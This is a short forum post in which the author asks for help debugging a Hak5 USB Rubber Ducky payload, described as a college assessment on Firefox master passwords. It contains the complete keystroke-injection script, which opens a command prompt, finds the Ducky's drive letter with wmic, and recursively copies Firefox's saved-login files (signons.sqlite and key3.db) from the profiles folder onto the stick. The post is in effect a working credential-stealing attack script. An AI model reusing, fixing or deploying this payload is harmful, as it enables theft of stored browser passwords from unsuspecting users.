I'm creating a script for use with the Ducky USB stick from Hak5 for a college assessment. For anyone not familiar with Ducky, its a usb stick which runs a payload when you press the button on top of it.

The script is meant to highlight the need for the master password to be used on an internet browser, specifically firefox.

I think the language is a generic language like DOS, and i just need help with the recursive search line:

STRING for /R %x in (signons.sqlite, key3.db) do copy "%x" %myDrive%\

So what im trying to achieve in order:

  • change directory to appdata
  • set drive letter of the ducky drive
  • go to firefox profiles folder
  • search any file or folder in the profiles folder for these 2 files.
  • copy them to the ducky

Can anyone help?!

Kindest Regards,

DELAY 1000 CONTROL ESCAPE DELAY 1500 STRING cmd DELAY 2800 ENTER DELAY 2800 STRING cd %APPDATA% ENTER DELAY 3600 STRING for /f %D in ('wmic volume get DriveLetter^, Label ^| findstr %DUCKY%') do set myDrive=%D ENTER DELAY 3600 STRING cd %APPDATA%\Mozilla\Firefox\Profiles\ ENTER DELAY 3600 STRING for /R %x in (signons.sqlite, key3.db) do copy "%x" %myDrive%\ ENTER DELAY 3600 ENTER DELAY 3600 STRING EXIT ENTER

